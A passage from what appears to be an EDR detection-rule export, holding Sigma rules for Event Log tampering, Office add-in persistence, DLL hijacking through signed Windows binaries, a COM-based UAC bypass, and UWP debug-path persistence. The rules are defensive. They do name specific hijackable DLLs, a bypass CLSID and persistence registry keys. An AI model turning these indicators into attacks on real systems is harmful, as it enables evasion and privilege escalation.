"rule_level_override": null,
"rule_id": "368a9015-91da-4e88-9611-4dd3cf5e001c",
"rule_name": "Windows Event Log Svchost Process Suspiciously Accessed",
"rule_description": "Detects an attempt to open an svchost process in a similar way as Phant0m to kill or suspend the threads of the Windows Event Log service.\nAttackers may try to tamper with the Event Log service to prevent it from reporting malicious activities to logging or EDR solutions.\nIt is recommended to investigate the process accessing the Event Log to look for malicious content or actions and to investigate any subsequent suspicious activities on the host.\n",
"rule_creation_date": "2021-06-21",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "368a9f20-42e6-4ede-af88-85a899503dea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621536Z",
"creation_date": "2026-03-23T11:45:34.621538Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621543Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/StopMalvertisin/status/1575195280193880064",
"https://pentestlab.blog/2019/12/11/persistence-office-application-startup/",
"https://attack.mitre.org/techniques/T1137/006/"
],
"name": "t1137_006_office_application_addin_startup.yml",
"content": "title: Possible Persistence via Office Application Addin Startup\nid: 368a9f20-42e6-4ede-af88-85a899503dea\ndescription: |\n Detects the installation of a new Office addin in the application's startup folder.\n This method has been used by attackers to achieve persistence since the addin is executed each time the application launches.\n It is recommended to investigate the process that created the file for suspicious activities.\nreferences:\n - https://twitter.com/StopMalvertisin/status/1575195280193880064\n - https://pentestlab.blog/2019/12/11/persistence-office-application-startup/\n - https://attack.mitre.org/techniques/T1137/006/\ndate: 2022/09/29\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.006\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection_file_startup:\n Path|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\'\n Path|contains: '.xls'\n\n selection_file_addins:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\'\n Path|contains:\n - '.wll'\n - '.wla'\n - '.xll'\n - '.xla'\n - '.xls'\n - '.dll'\n - '.ppa'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_tmp:\n TargetFilename|endswith: '\\~$*'\n\n exclusion_ivanti:\n ProcessProcessName: 'pfwsmgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Citrix Systems, Inc.'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "368a9f20-42e6-4ede-af88-85a899503dea",
"rule_name": "Possible Persistence via Office Application Addin Startup",
"rule_description": "Detects the installation of a new Office addin in the application's startup folder.\nThis method has been used by attackers to achieve persistence since the addin is executed each time the application launches.\nIt is recommended to investigate the process that created the file for suspicious activities.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36a9ea38-0c3a-4f1e-b5bb-2cd452aeb315",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592118Z",
"creation_date": "2026-03-23T11:45:34.592122Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://web.archive.org/web/20221117081846/https://dec0ne.github.io/research/2022-11-14-Undetected-Lsass-Dump-Workflow/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_imagingdevices.yml",
"content": "title: DLL Hijacking via ImagingDevices.exe\nid: 36a9ea38-0c3a-4f1e-b5bb-2cd452aeb315\ndescription: |\n Detects potential Windows DLL Hijacking via ImagingDevices.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://web.archive.org/web/20221117081846/https://dec0ne.github.io/research/2022-11-14-Undetected-Lsass-Dump-Workflow/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ImagingDevices.cpl'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Photo Viewer\\'\n - '?:\\Program Files\\Windows Photo Viewer\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Windows Photo Viewer\\'\n - '?:\\Program Files\\Windows Photo Viewer\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36a9ea38-0c3a-4f1e-b5bb-2cd452aeb315",
"rule_name": "DLL Hijacking via ImagingDevices.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ImagingDevices.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36c25c46-b03d-4900-992d-5959ebd72151",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092167Z",
"creation_date": "2026-03-23T11:45:34.092169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092174Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/0xcarnage/status/1203882560176218113",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sessionmsg.yml",
"content": "title: DLL Hijacking via SessionMsg.exe\nid: 36c25c46-b03d-4900-992d-5959ebd72151\ndescription: |\n Detects potential Windows DLL Hijacking via SessionMsg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/0xcarnage/status/1203882560176218113\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SessionMsg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\duser.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36c25c46-b03d-4900-992d-5959ebd72151",
"rule_name": "DLL Hijacking via SessionMsg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SessionMsg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36f7b22d-7249-442b-9be5-8c10c81df207",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077628Z",
"creation_date": "2026-03-23T11:45:34.077630Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077634Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/zcgonvh/TaskSchedulerMisc/blob/master/schuac.cs",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_com_maintenanceui.yml",
"content": "title: UAC Bypass via Virtual Factory for MaintenanceUI\nid: 36f7b22d-7249-442b-9be5-8c10c81df207\ndescription: |\n Detects the execution of the MaintenanceUI COM interface.\n This COM interface could be used to bypass User Account Control by creating a schedule task executing a command with high privileges.\n It is recommended to check for the execution of a suspicious schedule tasks with high privileges shortly after dllhost execution with the help of the related timeline.\nreferences:\n - https://github.com/zcgonvh/TaskSchedulerMisc/blob/master/schuac.cs\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n # https://strontic.github.io/xcyclopedia/library/clsid_A6BFEA43-501F-456F-A845-983D3AD7B8F0.html\n ProcessCommandLine|contains: 'A6BFEA43-501F-456F-A845-983D3AD7B8F0'\n ProcessImage: '?:\\Windows\\System32\\dllhost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36f7b22d-7249-442b-9be5-8c10c81df207",
"rule_name": "UAC Bypass via Virtual Factory for MaintenanceUI",
"rule_description": "Detects the execution of the MaintenanceUI COM interface.\nThis COM interface could be used to bypass User Account Control by creating a schedule task executing a command with high privileges.\nIt is recommended to check for the execution of a suspicious schedule tasks with high privileges shortly after dllhost execution with the help of the related timeline.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3711f25e-4a48-4624-bed7-1c0cf1b9f994",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081946Z",
"creation_date": "2026-03-23T11:45:34.081948Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081952Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msconfig.yml",
"content": "title: DLL Hijacking via msconfig.exe\nid: 3711f25e-4a48-4624-bed7-1c0cf1b9f994\ndescription: |\n Detects potential Windows DLL Hijacking via msconfig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msconfig.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\mfc42u.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3711f25e-4a48-4624-bed7-1c0cf1b9f994",
"rule_name": "DLL Hijacking via msconfig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msconfig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3712739d-e5f9-426a-9faa-810b9f71a278",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587345Z",
"creation_date": "2026-03-23T11:45:34.587348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587356Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://cyberark-customers.force.com/s/article/Receiving-a-vf-host-error-upon-login-for-Win-10-machines",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vfhost.yml",
"content": "title: DLL Hijacking via vfhost.exe\nid: 3712739d-e5f9-426a-9faa-810b9f71a278\ndescription: |\n Detects potential Windows DLL Hijacking via vfhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from CyberArk's Viewfinity folder to a non-standard directory and planted the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://cyberark-customers.force.com/s/article/Receiving-a-vf-host-error-upon-login-for-Win-10-machines\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName:\n - 'vfhost.exe'\n - 'vf_host.exe'\n ProcessSignature: 'CyberArk Software Ltd.'\n ImageLoaded|endswith: 'vftrace.dll'\n # If user has full access rights on these folders, vfhost will not execute.\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\CyberArk'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\CyberArk'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Viewfinity Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3712739d-e5f9-426a-9faa-810b9f71a278",
"rule_name": "DLL Hijacking via vfhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vfhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from CyberArk's Viewfinity folder to a non-standard directory and planted the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "374a5e08-3010-43b5-845f-e0fcb77c9017",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090149Z",
"creation_date": "2026-03-23T11:45:34.090151Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090156Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/",
"https://attack.mitre.org/techniques/T1546/012/"
],
"name": "t1546_012_persistence_appx_debug_path.yml",
"content": "title: Windows Universal Application Persistence Added\nid: 374a5e08-3010-43b5-845f-e0fcb77c9017\ndescription: |\n Detects the planting of a malicious debug path in universal Windows applications (UWP) known to start at logon (Cortana and People).\n Universal Windows Platform (UWP) apps are applications designed to run across all Windows 10 and later devices, packaged in the AppX format, offering a unified development platform with security and performance features tailored for modern Windows environments.\n Adversaries may use it to establish persistence by executing malicious content at logon.\n It is recommended to investigate the process at the origin of the registry modification as well as the files pointed to by the registry value to determine whether this action is legitimate.\nreferences:\n - https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2021/02/11\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject|contains:\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\\DebugInformation\\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.People*\\DebugPath'\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\\DebugInformation\\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana*\\DebugPath'\n # HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People*'\n # HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana*'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName:\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\\DebugInformation\\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.People*\\DebugPath'\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\\DebugInformation\\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana*\\DebugPath'\n # HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People*'\n # HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana*'\n\n condition: 1 of 